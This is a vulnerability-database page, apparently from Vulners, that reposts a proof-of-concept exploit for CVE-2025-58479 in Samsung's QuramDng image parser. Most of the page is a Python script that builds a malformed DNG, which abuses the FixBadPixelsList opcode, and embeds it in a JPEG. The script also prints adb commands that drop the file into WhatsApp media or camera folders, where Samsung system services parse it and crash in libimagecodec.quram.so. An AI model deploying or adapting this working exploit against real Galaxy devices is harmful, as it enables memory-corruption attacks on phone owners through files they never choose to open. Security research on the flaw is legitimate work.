Vulners
Lucene search
📄 Samsung QuramDng Embedded DNG Out-Of-Bounds Read / Write
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | SAMSUNG Mobile devices 安全漏洞 | 2 Dec 202500:00 | – | cnnvd |
 | CVE-2025-58479 | 2 Dec 202501:24 | – | cve |
 | CVE-2025-58479 | 2 Dec 202501:24 | – | cvelist |
 | EUVD-2025-200139 | 2 Dec 202501:24 | – | euvd |
 | Vulnerabilities fixed in Google Android and Samsung Mobile | 2 Dec 202513:25 | – | ncsc |
 | CVE-2025-58479 | 2 Dec 202502:15 | – | nvd |
 | CVE-2025-58479 | 2 Dec 202502:15 | – | osv |
 | PT-2025-48597 | 2 Dec 202500:00 | – | ptsecurity |
 | CVE-2025-58479 | 3 Dec 202514:02 | – | redhatcve |
 | CVE-2025-58479 | 2 Dec 202501:24 | – | vulnrichment |
10
=============================================================================================================================================
| # Title : Samsung QuramDng via Malicious DNG Embedded in JPEG Out-of-Bounds Read/Write |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : https://www.samsung.com/us/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/213367/ & CVE-2025-58479
[+] Summary : This proof-of-concept demonstrates an out-of-bounds read/write vulnerability in Samsung’s QuramDng image parser, affecting Galaxy S22–S25 devices running One UI 6+.
By crafting a malformed DNG that abuses the OpcodeList1 (specifically the FixBadPixelsList opcode) and embedding it inside a JPEG container, the parser processes invalid pixel coordinates without proper bounds checking.
When handled by system components such as com.samsung.ipservice, Media Scanner, or Samsung Gallery, the malformed metadata can trigger memory corruption and result in a crash (SIGSEGV) within libimagecodec.quram.so.
[+] POC :
#!/usr/bin/env python3
import struct
import sys
import os
def create_malicious_dng():
dng_data = bytearray()
dng_data.extend(b'II\x2A\x00')
dng_data.extend(struct.pack('<I', 8))
ifd0_offset = len(dng_data)
dng_data.extend(struct.pack('<H', 5))
dng_data.extend(struct.pack('<H', 256))
dng_data.extend(struct.pack('<H', 4))
dng_data.extend(struct.pack('<I', 1))
dng_data.extend(struct.pack('<I', 1024))
dng_data.extend(struct.pack('<H', 257))
dng_data.extend(struct.pack('<H', 4))
dng_data.extend(struct.pack('<I', 1))
dng_data.extend(struct.pack('<I', 32))
dng_data.extend(struct.pack('<H', 322))
dng_data.extend(struct.pack('<H', 4))
dng_data.extend(struct.pack('<I', 1))
dng_data.extend(struct.pack('<I', 1024))
dng_data.extend(struct.pack('<H', 323))
dng_data.extend(struct.pack('<H', 4))
dng_data.extend(struct.pack('<I', 1))
dng_data.extend(struct.pack('<I', 32))
dng_data.extend(struct.pack('<H', 51008))
dng_data.extend(struct.pack('<H', 1))
dng_data.extend(struct.pack('<I', 100))
opcode_offset = len(dng_data) + 4
dng_data.extend(struct.pack('<I', opcode_offset))
dng_data.extend(struct.pack('<I', 0))
dng_data.extend(struct.pack('<I', opcode_offset))
opcode_data = bytearray()
opcode_data.extend(struct.pack('<H', 1))
opcode_data.extend(struct.pack('<H', 36))
opcode_data.extend(struct.pack('<I', 0x00030001))
opcode_data.extend(struct.pack('<I', 0x41414141))
opcode_data.extend(struct.pack('<B', 0))
opcode_data.extend(struct.pack('<H', 1))
opcode_data.extend(struct.pack('<H', 1))
opcode_data.extend(struct.pack('<H', 32))
opcode_data.extend(struct.pack('<H', 0))
opcode_data.extend(struct.pack('<H', 0))
opcode_data.extend(struct.pack('<H', 0))
opcode_data.extend(struct.pack('<H', 1))
opcode_data.extend(struct.pack('<H', 1))
while len(opcode_data) < 36:
opcode_data.extend(b'\x00')
dng_data.extend(opcode_data)
image_data_offset = len(dng_data)
dng_data.extend(b'\x00' * 1024 * 32 * 2) # Minimal raw image data
return bytes(dng_data)
def create_poc_jpeg_wrapper():
jpeg_data = bytearray()
jpeg_data.extend(b'\xFF\xD8\xFF\xE0')
jpeg_data.extend(b'\x00\x10')
jpeg_data.extend(b'JFIF\x00\x01\x02\x00\x00\x64\x00\x64\x00\x00')
jpeg_data.extend(b'\xFF\xFE')
comment = b"Malicious DNG for CVE-2025-58479"
jpeg_data.extend(struct.pack('>H', len(comment) + 2))
jpeg_data.extend(comment)
dng_data = create_malicious_dng()
jpeg_data.extend(b'\xFF\xED')
jpeg_data.extend(struct.pack('>H', len(dng_data) + 2))
jpeg_data.extend(dng_data)
jpeg_data.extend(b'\xFF\xDB')
jpeg_data.extend(b'\x00\x43\x00\x03\x02\x02\x02\x02\x02\x03\x02\x02\x02\x03\x03\x03\x03\x04\x06\x04\x04\x04\x04\x04\x08\x06\x06\x05\x06\x09\x08\x0A\x0A\x09\x08\x09\x09\x0A\x0C\x0F\x0C\x0A\x0B\x0E\x0B\x09\x09\x0D\x11\x0D\x0E\x0F\x10\x10\x11\x10\x0A\x0C\x12\x13\x12\x10\x13\x0F\x10\x10\x10\x01')
jpeg_data.extend(b'\xFF\xC0')
jpeg_data.extend(b'\x00\x0B\x08\x00\x01\x00\x01\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01')
jpeg_data.extend(b'\xFF\xC4')
jpeg_data.extend(b'\x00\x1F\x00\x00\x01\x05\x01\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0A\x0B')
jpeg_data.extend(b'\x00\x0C\x03\x01\x00\x02\x11\x03\x11\x00\x3F\x00')
jpeg_data.extend(b'\x00')
jpeg_data.extend(b'\xFF\xD9')
return bytes(jpeg_data)
def main():
print("[*] Creating PoC for CVE-2025-58479 - Samsung QuramDng OOB Vulnerability")
print("[*] Affected: Samsung Galaxy S22-S25 with One UI 6+")
poc_data = create_poc_jpeg_wrapper()
filename = "poc_cve_2025_58479.jpeg"
with open(filename, "wb") as f:
f.write(poc_data)
print(f"[+] Created malicious file: {filename}")
print(f"[+] File size: {len(poc_data)} bytes")
print("\n[*] To test on device:")
print(f" adb push {filename} /storage/emulated/0/Android/media/com.whatsapp/WhatsApp/Media/WhatsApp\\ Images/")
print(f" adb shell am broadcast -a android.intent.action.MEDIA_SCANNER_SCAN_FILE -d file:///storage/emulated/0/Android/media/com.whatsapp/WhatsApp/Media/WhatsApp%20Images/{filename}")
print("\n[*] Wait ~5 minutes for com.samsung.ipservice to process the file")
print("[*] Expected: Crash in libimagecodec.quram.so with SIGSEGV")
print("\n[*] Alternative test with Gallery:")
print(f" adb push {filename} /storage/emulated/0/DCIM/Camera/")
print(f" adb shell am broadcast -a android.intent.action.MEDIA_SCANNER_SCAN_FILE -d file:///storage/emulated/0/DCIM/Camera/{filename}")
print("\n[*] Open Samsung Gallery to trigger decode")
if __name__ == "__main__":
main()
Greetings to :============================================================
jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|
==========================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 Feb 2026 00:00Current
5.7Medium risk
Vulners AI Score5.7
CVSS 3.14.3 - 7.5
EPSS0.00225
SSVC